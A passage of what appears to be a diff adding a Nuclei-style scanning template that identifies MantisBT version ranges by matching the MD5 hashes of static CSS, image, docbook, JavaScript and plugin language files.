"{{BaseURL}}/css/images/ui-icons_ef8c08_256x240.png" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"772a64d6df4b93d230e9b38e1ab7522a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/images/pattern.jpg" + + matchers: + - type: dsl + name: 2.0.0 - 2.24.3 + dsl: + - "(\"94fbcaa1b6abb1a970bd9afb0814b85e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/images/icons-18-black.png" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"f9e3c93059ef0fc1ca1ead499f19d489\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/images/ui-icons_ffd27a_256x240.png" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"6686d21b904e18b100210169bb1c04ad\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/images/ui-icons_cd0a0a_256x240.png" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"3e450c2a2c66328d9498e7001ad7197c\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/images/ui-bg_glass_95_fef1ec_1x400.png" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"5a3be2d8fff8324d59aec3df7b0a0c83\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/images/ui-bg_diagonals-thick_18_b81900_40x40.png" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"4d4e638960a1a29b0d6b693b445087da\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/images/ui-bg_gloss-wave_35_f6a828_500x100.png" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"23932de7c235b03187b8a5de3d024490\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/images/ui-bg_flat_10_000000_40x100.png" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"c31d5fc3eb7d82c628a82e3b87024cd1\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/images/icons-36-black.png" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"24bde6ae0459e200a2b2ac290787022d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/images/ui-bg_flat_75_ffffff_40x100.png" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"8692e6efddf882acbff144c38ea7dfdf\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/images/ui-bg_glass_100_fdf5ce_1x400.png" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"fe58c3539111d3021776e6833169c5e1\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/images/ajax-loader.gif" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"08a3028fda91d443f4d5e93307c96fcd\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/images/ui-icons_888888_256x240.png" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"9c46d7cab43e22a14bad26d2d4806d80\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/images/ui-bg_flat_0_aaaaaa_40x100.png" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"2a44fbdb7360c60122bcf6dcef0387d8\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/images/ui-icons_ffffff_256x240.png" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"a19fe1b2d726e920c12e43a65df9039a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/images/ui-icons_228ef1_256x240.png" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"2f257489d9600ddf56d195a179ebc9df\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/images/ui-icons_222222_256x240.png" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"4c27b34156b7a3776f31cc456ca01c10\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/images/icons-18-white.png" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"b3da1f56006b8f830af6dde218d72185\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/images/icons-36-white.png" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"632ff9bef83adcf1cd745c938a4216af\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/images/ui-bg_highlight-soft_100_eeeeee_1x100.png" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"0b708185ce8927f18c7b3b82a7e7c247\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/images/ui-bg_glass_75_e6e6e6_1x400.png" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"f4254356c2a8c9a383205ef2c4de22c4\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/images/ui-bg_glass_55_fbf9ee_1x400.png" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"f8f4558e0b92ff2cd6136781533902ec\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/images/ui-icons_454545_256x240.png" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"119dd0c2e94ad689de873ef39fd43e6e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/images/ajax-loader.png" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"3bdd7116009b8f7b091b44e5e71a967c\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/images/ui-icons_2e83ff_256x240.png" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"2b99a5e48d3c3957d03027d36a25e8bb\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/images/ui-bg_glass_65_ffffff_1x400.png" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"b624f702075cd719a38f428e143025ea\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/open-sans.css" + + matchers: + - type: dsl + name: 2.0.0 - 2.10.1 + dsl: + - "(\"7cafad97aafcdaa7fce10cc2d6201e51\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/ace-rtl.min.css" + + matchers: + - type: dsl + name: 2.2.0 - 2.24.3 + dsl: + - "(\"36f9d61abb30f70f4bfafdd8b570fac5\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.1.3 + dsl: + - "(\"c0d5fbd10e11824bd7eceac0fe75bcec\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/bootstrap-3.3.6.css" + + matchers: + - type: dsl + name: 2.0.0 - 2.19.1 + dsl: + - "(\"96fab2e78ab167d8b2bf13a709030b11\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/ace-skins.min.css" + + matchers: + - type: dsl + name: 2.2.0 - 2.24.3 + dsl: + - "(\"7c31ea5156c20439e3e7cb74d7a670b1\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.1.3 + dsl: + - "(\"d5139739940ab61741bd73d5b682aff7\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/ace-skins.css" + + matchers: + - type: dsl + name: 2.2.0 - 2.24.3 + dsl: + - "(\"2a2f41e2b21b031a14c09833d4b782b2\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.1.3 + dsl: + - "(\"56b5775aad43cba224258c28621b5245\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/dropzone-4.3.0.min.css" + + matchers: + - type: dsl + name: 2.2.0 - 2.19.1 + dsl: + - "(\"b9cbf279e35c988f3eeaa2521d9234dc\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/bootstrap-datetimepicker-4.17.47.min.css" + + matchers: + - type: dsl + name: 2.6.0 - 2.24.3 + dsl: + - "(\"fc28fdcaebe06f95b628b7afff4afa9e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/rtl.css" + + matchers: + - type: dsl + name: 2.0.0 - 2.24.3 + dsl: + - "(\"55aa6b70a60bcf0ee7c5b24564a7b668\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"a9e44d30b8cee47ce4c44866659672db\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"dc735a8099caeff3366ec7140ad48260\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/ace-part2.min.css" + + matchers: + - type: dsl + name: 2.2.0 - 2.7.1 + dsl: + - "(\"f5e7d799350827de62366feb0cc2afe4\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.1.3 + dsl: + - "(\"2fd79ef21a811bbaf05d9b0dbb88d126\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/ace-ie.min.css" + + matchers: + - type: dsl + name: 2.0.0 - 2.7.1 + dsl: + - "(\"1763ade9dc29ec8e4c44f55aec66418d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/ace-ie.css" + + matchers: + - type: dsl + name: 2.0.0 - 2.15.1 + dsl: + - "(\"518e36655b2f252f6213472ceb1d5dbb\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/bootstrap-3.3.6.min.css" + + matchers: + - type: dsl + name: 2.0.0 - 2.19.1 + dsl: + - "(\"d33c26316e73bab38fbaa1dab3ec9ce4\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/Makefile" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"3248a5e47574567a1ee52c0b3aeb9266\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/Author_Group.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"ad956a3236dfde8b2c4b61d930d09e43\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/Book_Info.xml" + + matchers: + - type: dsl + name: 2.0.0 - 2.24.3 + dsl: + - "(\"2ca5366da3286bdd4888d40908fc8286\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"01a70c2990755a3cec39f8a3dc09ecdb\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/news.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"3283c9516475b9591b1c26de98b1b451\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/subprojects.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"75b06e7076d7e3c1238e4190f85b9e10\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/cookies.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"424428a7b03b3ba8b4e93eee06029436\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/user.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"7dde1c25b3945b6401196329e2e2fa2b\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/path.xml" + + matchers: + - type: dsl + name: 2.0.0 - 2.24.3 + dsl: + - "(\"4802464f16c76d6d42b9bf01d3de9042\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"554cfaafabcb5d260af2c4d8027a584f\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/sponsorship.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"b9ddcc1216a1ca9f8dc571a149fea839\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/wiki.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"a99cf90055989ac146e707e4dd9ca733\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/view.xml" + + matchers: + - type: dsl + name: 2.0.0 - 2.24.3 + dsl: + - "(\"f67d0495cd323929c6b432c4af932796\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/customfields.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"62a756872bbb512d13fc60b3785e2190\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/timezone.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"027be4b01ba27fbf83a983f807c36f94\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/language.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"9db91e6a1710ba774a229f20ab72711a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/version.xml" + + matchers: + - type: dsl + name: 2.3.0 - 2.24.3 + dsl: + - "(\"33ce0f963160c9617ea6c782011ce426\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.2.4 + dsl: + - "(\"5f7a847cc4e56c2919cf12e8f547ffc1\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/settings.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"0c8cdc150fdfdffde8c9d25e5762fa3f\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/speed.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"fd37d5f595ff8b4091f2eeb27c6624de\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/antispam.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"8c6630b9ccbd3172cac9c2f29160e7e7\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/bugnote.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"9ea2d031cc6634717c784a2d62ca904d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/reminders.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"d013acad11d27a619cd0c9ca06ff6b95\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/security.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"3b87bc46f8693c2f71c4b10755cfd005\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/signup.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"c2ff0bfac16810a6aeeab35e68e3b0b1\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/time.xml" + + matchers: + - type: dsl + name: 2.4.0 - 2.24.3 + dsl: + - "(\"feda0f37193304c458c854c882f2704e\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.3.3 + dsl: + - "(\"4da2f31d192b47942247fe25b00b296d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/bughistory.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"bb7e2aa975efdcbf864f2b644f64e85b\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/Admin_Guide.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"2aa74e623530c8424566ca6f55311abe\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/Project_Management.xml" + + matchers: + - type: dsl + name: 1.3.5 - 2.24.3 + dsl: + - "(\"a57ee7fb8ae248036fd7827ef4fb2cca\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.4 + dsl: + - "(\"25bb9418692f7a7c34b02659bcd3931c\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/Admin_Guide.ent" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"0a295807a7bb252472ea026e5450b289\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/Preface.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"ef36e942a7936ee437d9b19e18f543d3\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/Authentication.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"9ca72797361731458f92d1adead05ec3\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/Contributing.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"15d47247bcb04722df33f214b1f32618\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Makefile" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"816bcc6df5387e07e143c4d3cf23dbd3\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/README.md" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"4334c1e93429d46673f2fea24c1e63c4\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Developers_Guide/Makefile" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"3248a5e47574567a1ee52c0b3aeb9266\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Developers_Guide/en-US/Plugins.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"f0a17bfeb995676c9248f2d5134611d1\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Developers_Guide/en-US/Events_Reference_Manage.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"e444586036d3b644d5e82ef09468f107\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Developers_Guide/en-US/Integrating.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"d77ca4774641a8a406d631202f9cfcc8\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Developers_Guide/en-US/Developers_Guide.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"d2f69318495e5e65fc1ea274262772f6\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Developers_Guide/en-US/Events_Reference_Notify.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"c0d85e5f81ad97e283a94490d3e37603\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Developers_Guide/en-US/Author_Group.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"ad956a3236dfde8b2c4b61d930d09e43\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Developers_Guide/en-US/Database.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"8e553d20f62b3cdcc9b8cde5851c69f8\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Developers_Guide/en-US/Book_Info.xml" + + matchers: + - type: dsl + name: 2.0.0 - 2.24.3 + dsl: + - "(\"864bf62933bf2fe4e0db8956166918d8\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"f418102e242fa3b39e404da890ba93c1\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Developers_Guide/en-US/Events_Reference_Filter.xml" + + matchers: + - type: dsl + name: 1.3.4 - 2.24.3 + dsl: + - "(\"11ff9b50af1e6465b902c4560e113b01\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"78cedeaa9dda3581d0fbb0d8ef9feabb\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Developers_Guide/en-US/Developers_Guide.ent" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"d8a3d1c6e1aca4ec1154a263ce1fd801\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Developers_Guide/en-US/Plugins_Building_Source.xml" + + matchers: + - type: dsl + name: 2.1.0 - 2.24.3 + dsl: + - "(\"b9da5d2123ba3bffa4425e44cd2c2f90\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.0.1 + dsl: + - "(\"c2ba1439ec0e7cbe3dba7d9b6b70103d\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"cbb96f124cee88dd6d16dcfa3b644a4f\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Developers_Guide/en-US/Plugins_Building.xml" + + matchers: + - type: dsl + name: 2.1.0 - 2.24.3 + dsl: + - "(\"5a91e584ea408c9bfd4f29833dfdd480\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.0.1 + dsl: + - "(\"5b5fb7c2595e5a2209f25ff7ecb5ae76\" == md5(body))" + - type: dsl + name: 1.3.3 - 1.3.20 + dsl: + - "(\"46854c99eb8ec914ffa4816d404ee702\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.2 + dsl: + - "(\"4335a26efcbcee4d2049bf455627f6cf\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Developers_Guide/en-US/Preface.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"441ecd570493591d6105fd8868921705\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Developers_Guide/en-US/Appendix.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"1781bb57a74f1b14f114b787015840b6\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Developers_Guide/en-US/Events_Reference_Account.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"503dfad6ddc5972c4cdedf1287e3fcac\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/typeahead.jquery-1.1.1.min.js" + + matchers: + - type: dsl + name: 2.2.0 - 2.22.2 + dsl: + - "(\"2a2dbfad50a690d862cf167df535c418\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/ace.js" + + matchers: + - type: dsl + name: 2.2.0 - 2.24.3 + dsl: + - "(\"7e5cbf6f5cf6af4dc2704bd7f8f68a07\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.1.3 + dsl: + - "(\"ab406dafaba62a12ebffd6cb79290e9c\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/html5shiv.min.js" + + matchers: + - type: dsl + name: 2.0.0 - 2.7.1 + dsl: + - "(\"737724351e2197f55eabc27c83fdb1a5\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/ace.min.js" + + matchers: + - type: dsl + name: 2.2.0 - 2.24.3 + dsl: + - "(\"d8fcc48393e5d4360d425178e71e5c80\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.1.3 + dsl: + - "(\"97aa9435ebfd13fea1fb46a832219a9f\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/moment-with-locales-2.15.2.min.js" + + matchers: + - type: dsl + name: 2.0.0 - 2.22.2 + dsl: + - "(\"c3c60413c0751ed1b69a98927779f7ee\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/bootstrap-3.3.6.min.js" + + matchers: + - type: dsl + name: 2.0.0 - 2.19.1 + dsl: + - "(\"c5b5b2fa19bd66ff23211d9f844e0131\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/list-1.4.1.min.js" + + matchers: + - type: dsl + name: 2.1.0 - 2.19.1 + dsl: + - "(\"d3d341a0eb64ad79c3d31f57091cc020\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/login.js" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"09c78eb02c644ec0d4512f5e3cb6b520\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/jquery-2.2.4.min.js" + + matchers: + - type: dsl + name: 2.0.0 - 2.24.3 + dsl: + - "(\"2f6b11a7e914718e0290410e85366fe9\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/respond.min.js" + + matchers: + - type: dsl + name: 2.0.0 - 2.7.1 + dsl: + - "(\"cdef4a9c511a600425696d10d138a64b\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/manage_custom_field_edit_page.js" + + matchers: + - type: dsl + name: 2.0.0 - 2.24.3 + dsl: + - "(\"3f65dd805a1e8677f7477b8825bb846c\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"10a2d6ae70b37869bf7b3f120d4504c0\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/dropzone-4.3.0.js" + + matchers: + - type: dsl + name: 2.2.0 - 2.19.1 + dsl: + - "(\"3bd5e9eb88ec2d7ee8825bccc6462646\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/bootstrap-datetimepicker-4.17.47.min.js" + + matchers: + - type: dsl + name: 2.6.0 - 2.24.3 + dsl: + - "(\"8a36160a466cad1a9e414321f4784baf\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/dropzone-4.3.0.min.js" + + matchers: + - type: dsl + name: 2.2.0 - 2.19.1 + dsl: + - "(\"f9b915337650a13583b5d29d30464f99\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_danish.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.6.0 + dsl: + - "(\"c965624f47469ce0e4e3cb75bc56a2b0\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"8f9bcc30e5372d9dff4e55da3a1f52ce\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"f9961b048ec7fc3d78e8a0b25b9dce7b\" == md5(body))" + - type: dsl + name: 2.7.0 - 2.24.3 + dsl: + - "(\"c5d2d2f6036c14a4e345db69b70590bd\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/summary.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.7.1 + dsl: + - "(\"9675f4c0b6709967fa955d3ca0566372\" == md5(body))" + - type: dsl + name: 2.8.0 - 2.24.3 + dsl: + - "(\"2dcbddc633e43bfa0c72f517cf73366c\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_dutch.txt" + + matchers: + - type: dsl + name: 2.13.0 - 2.24.3 + dsl: + - "(\"c3fb9868bd146b30628c061e20fcb942\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_breton.txt" + + matchers: + - type: dsl + name: 2.13.0 - 2.24.3 + dsl: + - "(\"613c5054714302a5b75cbad5c416a7ec\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_galician.txt" + + matchers: + - type: dsl + name: 2.13.0 - 2.24.3 + dsl: + - "(\"85cb4a22c67d4552c62fb16357739cfd\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_asturian.txt" + + matchers: + - type: dsl + name: 2.13.0 - 2.24.3 + dsl: + - "(\"63ff962e132c66dd3e67203d2c437b62\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_laki.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.14.0 + dsl: + - "(\"cc69014c4f3c309ca4fd29bd38b9650a\" == md5(body))" + - type: dsl + name: 2.15.0 - 2.24.3 + dsl: + - "(\"bc394e2fbb8f85ff5f34081750c19d57\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_laki.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.14.0 + dsl: + - "(\"f78db1de766a5aa41823365451b0f945\" == md5(body))" + - type: dsl + name: 2.15.0 - 2.24.3 + dsl: + - "(\"571699bcd813d8e7b2383993bedd523e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_spanish.txt" + + matchers: + - type: dsl + name: 2.15.0 - 2.24.3 + dsl: + - "(\"7ec8b513d9ca4817f58ee996737a76a2\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_greek.txt" + + matchers: + - type: dsl + name: 2.15.0 - 2.24.3 + dsl: + - "(\"0c0415e9ca06cc7865c7dfe349ceb318\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_vietnamese.txt" + + matchers: + - type: dsl + name: 2.15.0 - 2.24.3 + dsl: + - "(\"bc708807c00f42281a6ce9ab228b6357\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_arabic.txt" + + matchers: + - type: dsl + name: 2.17.0 - 2.24.3 + dsl: + - "(\"6165d232ccd804d081b726cc3b5e92f2\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_japanese.txt" + + 